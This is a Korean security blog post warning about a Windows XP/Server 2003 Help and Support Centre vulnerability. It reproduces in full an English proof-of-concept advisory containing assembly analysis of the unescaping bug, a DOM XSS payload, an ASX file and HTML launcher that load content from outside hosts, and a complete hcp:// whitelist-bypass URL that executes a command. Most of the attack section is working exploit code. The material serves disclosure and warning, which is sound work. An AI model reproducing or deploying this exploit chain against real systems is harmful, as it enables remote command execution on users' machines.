반응형
마이크로소프트(MicroSoft)의 Windows XP와 Windows Server 2003에서 도움말 및 지원센터에 관련 된 취약점이 발견되었다.
현재 POC가 공개되어서 0-Day공격으로 이어질 가능성이 농후하다.
당분간 파일이 첨부 된 스팸메일이나 보안에 취약한 사이트에는 들어가지 않는 것이 좋을 듯 하다.
- 관련 내용
- Affected Software(영향받는 소프트웨어)
Windows XP Service Pack 2 and Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
- Non-Affected Software(영향받지 않는 소프트웨어)
Microsoft Windows 2000 Service Pack 4
Windows Vista Service Pack 1 and Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems
Windows Server 2008 R2 for Itanium-based Systems
(참고사항)
Exploit Code로 인하여 일부 보안제품에서 블로그를 탐지 할 수 있음^^ㅋ
- Exploit Code(POC)
Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly
----------------------------------------------------------------------------
Help and Support Centre is the default application provided to access online
documentation for Microsoft Windows. Microsoft supports accessing help documents
directly via URLs by installing a protocol handler for the scheme "hcp",
a typical example is provided in the Windows XP Command Line Reference,
available at http://technet.microsoft.com/en-us/library/bb490918.aspx.
Using hcp:// URLs is intended to be safe, as when invoked via the registered
protocol handler the command line parameter /fromhcp is passed to the help
centre application. This flag switches the help centre into a restricted mode,
which will only permit a whitelisted set of help documents and parameters.
This design, introduced in SP2, is reasonably sound. A whitelist of trusted
documents is a safe way of allowing interaction with the documentation from
less-trusted sources. Unfortunately, an implementation error in the whitelist
allows it to be evaded.
URLs are normalised and unescaped prior to validation using
MPC::HTML::UrlUnescapeW(), which in turn uses MPC::HexToNum() to translate URL
escape sequences into their original characters, the relevant code from
helpctr.exe 5.1.2600.5512 (latest at time of writing) is below.
.text:0106684C Unescape:
.text:0106684C cmp di, '%' ; di contains the current wchar in the input URL.
.text:01066850 jnz short LiteralChar ; if this is not a '%', it must be a literal character.
.text:01066852 push esi ; esi contains a pointer to the current position in URL to unescape.
.text:01066853 call ds:wcslen ; find the remaining length.
.text:01066859 cmp word ptr [esi], 'u' ; if the next wchar is 'u', this is a unicode escape and I need 4 xdigits.
.text:0106685D pop ecx ; this sequence calculates the number of wchars needed (4 or 2).
.text:0106685E setz cl ; i.e. %uXXXX (four needed), or %XX (two needed).
.text:01066861 mov dl, cl
.text:01066863 neg dl
.text:01066865 sbb edx, edx
.text:01066867 and edx, 3
.text:0106686A inc edx
.text:0106686B inc edx
.text:0106686C cmp eax, edx ; test if I have enough characters in input to decode.
.text:0106686E jl short LiteralChar ; if not enough, this '%' is considered literal.
.text:01066870 test cl, cl
.text:01066872 movzx eax, word ptr [esi+2]
.text:01066876 push eax
.text:01066877 jz short NotUnicode
.text:01066879 call HexToNum ; call MPC::HexToNum() to convert this nibble (4 bits) to an integer.
.text:0106687E mov edi, eax ; edi contains the running total of the value of this escape sequence.
.text:01066880 movzx eax, word ptr [esi+4]
.text:01066884 push eax
.text:01066885 shl edi, 4 ; shift edi left 4 positions to make room for the next digit, i.e. total <<= 4;
.text:01066888 call HexToNum
.text:0106688D or edi, eax ; or the next value into the 4-bit gap, i.e. total |= val.
.text:0106688F movzx eax, word ptr [esi+6]; this process continues for the remaining wchars.
.text:01066893 push eax
.text:01066894 shl edi, 4
.text:01066897 call HexToNum
.text:0106689C or edi, eax
.text:0106689E movzx eax, word ptr [esi+8]
.text:010668A2 push eax
.text:010668A3 shl edi, 4
.text:010668A6 call HexToNum
.text:010668AB or edi, eax
.text:010668AD add esi, 0Ah ; account for number of bytes (not chars) consumed by the escape.
.text:010668B0 jmp short FinishedEscape
.text:010668B2
.text:010668B2 NotUnicode:
.text:010668B2 call HexToNum ; this is the same code, but for non-unicode sequences (e.g. %41, instead of %u0041)
.text:010668B7 mov edi, eax
.text:010668B9 movzx eax, word ptr [esi]
.text:010668BC push eax
.text:010668BD call HexToNum
.text:010668C2 shl eax, 4
.text:010668C5 or edi, eax
.text:010668C7 add esi, 4 ; account for number of bytes (not chars) consumed by the escape.
.text:010668CA
.text:010668CA FinishedEscape:
.text:010668CA test di, di
.text:010668CD jz short loc_10668DA
.text:010668CF
.text:010668CF LiteralChar:
.text:010668CF push edi ; append the final value to the normalised string using a std::string append.
.text:010668D0 mov ecx, [ebp+unescaped]
.text:010668D3 push 1
.text:010668D5 call std::string::append
.text:010668DA mov di, [esi] ; fetch the next input character.
.text:010668DD test di, di ; have we reached the NUL terminator?
.text:010668E0 jnz Unescape ; process next char.
This code seems sane, but an error exists due to how MPC::HexToNum() handles
error conditions, the relevant section of code is annotated below.
.text:0102D32A mov edi, edi
.text:0102D32C push ebp
.text:0102D32D mov ebp, esp ; function prologue.
.text:0102D32F mov eax, [ebp+arg_0] ; fetch the character to convert.
.text:0102D332 cmp eax, '0'
.text:0102D335 jl short CheckUppercase ; is it a digit?
.text:0102D337 cmp eax, '9'
.text:0102D33A jg short CheckUppercase
.text:0102D33C add eax, 0FFFFFFD0h ; atoi(), probably written val - '0' and optimised by compiler.
.text:0102D33F jmp short Complete
.text:0102D341 CheckUppercase:
.text:0102D341 cmp eax, 'A'
.text:0102D344 jl short CheckLowercase ; is it an uppercase xdigit?
.text:0102D346 cmp eax, 'F'
.text:0102D349 jg short CheckLowercase
.text:0102D34B add eax, 0FFFFFFC9h ; atoi()
.text:0102D34E jmp short Complete
.text:0102D350 CheckLowercase:
.text:0102D350 cmp eax, 'a'
.text:0102D353 jl short Invalid ; lowercase xdigit?
.text:0102D355 cmp eax, 'f'
.text:0102D358 jg short Invalid
.text:0102D35A add eax, 0FFFFFFA9h ; atoi()
.text:0102D35D jmp short Complete
.text:0102D35F Invalid:
.text:0102D35F or eax, 0FFFFFFFFh ; invalid character, return -1
.text:0102D362 Complete:
.text:0102D362 pop ebp
.text:0102D363 retn 4
Thus, MPC::HTML::UrlUnescapeW() does not check the return code of
MPC::HexToNum() as required, and therefore can be manipulated into appending
unexpected garbage onto std::strings. This error may appear benign, but we can
use the miscalculations produced later in the code to evade the /fromhcp
whitelist.
Assuming that we can access arbitrary help documents (full details of how the
MPC:: error can be used to accomplish this will be explained below), we must
identify a document that can be controlled purely from the URL used to access it.
After browsing the documents available in a typical installation, the author
concluded the only way to do this would be a cross site scripting error. After
some careful searching, a candidate was discovered:
hcp://system/sysinfo/sysinfomain.htm?svr=<h1>test</h1>
This document is available in a default installation, and due to insufficient
escaping in GetServerName() from sysinfo/commonFunc.js, the page is vulnerable
to a DOM-type XSS. However, the escaping routine will abort encoding if characters
such as '=' or '"' or others are specified.
It's not immediately obvious that this error is still exploitable, simple
tricks like <img src=bad onerror=code> don't apply, and <script>code</script>
isn't helpful as the code isn't evaluated again. In situations like this, the
best course of action is to harass lcamtuf until he gives you the solution,
which of course his encyclopaedic knowledge of browser security quirks produced
immediately.
<script defer>code</script>
The defer property is an IE-ism which solves the problem, documented by
Microsoft here http://msdn.microsoft.com/en-us/library/ms533719%28VS.85%29.aspx.
Now that we are armed with knowledge of this trick, because these help
documents are in a privileged zone, we can simply execute commands.
You can test this with a command like so (assuming a recent IE):
C:\> ver
Microsoft Windows XP [Version 5.1.2600]
C:\> c:\windows\pchealth\helpctr\binaries\helpctr.exe -url "hcp://system/sysinfo/sysinfomain.htm?svr=<script defer>eval(unescape('Run%28%22calc.exe%22%29'))</script>"
C:\>
While this is fun, this isn't a vulnerability unless an untrusted third party
can force you to access it. Testing suggests that by default, accessing an
hcp:// URL from within Internet Explorer >= 8, Firefox, Chrome (and presumably
other browsers) will result in a prompt. Although most users will click through
this prompt (perfectly reasonable, protocol handlers are intended to be safe),
it's not a particularly exciting attack.
I've found a way to avoid the prompt in a default Windows XP installation in all
major browsers, The solution is to invoke the protocol handler from within an
<iframe> in an ASX HtmlView element. There are probably other ways.
http://en.wikipedia.org/wiki/Advanced_Stream_Redirector
The version of Windows Media Player that is available by default in Windows XP
is WMP9, which installs an NPAPI and ActiveX plugin to render windows media
content. Later versions also can be used, with some minor complications.
Thus, the attack will look like this:
$ cat simple.asx
<ASX VERSION="3.0">
<PARAM name="HTMLView" value="http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/starthelp.html"/>
<ENTRY>
<REF href="http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/bug-vs-feature.jpg"/>
</ENTRY>
</ASX>
Where starthelp.html contains something like:
$ cat starthelp.html
<iframe src="hcp://...">
Forcing a user to read an .ASX file can be achieved in a cross-browser manner like so:
$ cat launchurl.html
<html>
<head><title>Testing HCP</title></head>
<body>
<h1>OK</h1>
<script>
// HCP:// Vulnerability, Tavis Ormandy, June 2010.
var asx = "http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/simple.asx";
if (window.navigator.appName == "Microsoft Internet Explorer") {
// Internet Explorer
var o = document.createElement("OBJECT");
o.setAttribute("classid", "clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6");
o.openPlayer(asx);
} else {
// Mozilla, Chrome, Etc.
var o = document.createElement("IFRAME");
o.setAttribute("src", asx);
document.body.appendChild(o);
}
</script>
</body>
</html>
Therefore, we have the following interactions between multiple complex systems
chained together:
- From an html page, email, document, or other application force a user to
fetch a .ASX file containing an HtmlView element.
- From the HtmlView element, invoke the hcp protocol handler that would normally
require confirmation.
- From the HCP Protocol handler, bypass the /fromhcp whitelist by using the
string miscalculations caused by failing to check the return code of
MPC::HexToNum().
- Once the whitelist has been defeated, invoke the Help document with a known
DOM XSS due to GetServerName() insufficient escaping.
- Use the defer property of a script tag to execute script in a privileged zone
even after the page has been rendered.
- Invoke an arbitrary command using the wscript.shell object.
Figuring out how to use the MCP::HexToNum() error to defeat the /fromhcp
whitelist took some analysis, but the result looks like the following.
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%
A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%
A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3
Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%
3C/script%3E
'취약점소식' 카테고리의 다른 글
[Adobe]Adobe Reader/Acrobat 다중 취약점 보안업데이트 권고 (0) | 2010.07.01 |
---|---|
[Adobe]Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability (2) | 2010.06.11 |
[MS] 윈도우 디스플레이 드라이버 취약점 주의 (0) | 2010.05.20 |
[Adobe]Adobe Shockwave Player 11.5.6.606 (DIR) Multiple Memory Vulnerabilities (2) | 2010.05.12 |
[MS] Outlook Express and Windows Mail Integer Overflow (0) | 2010.05.11 |
댓글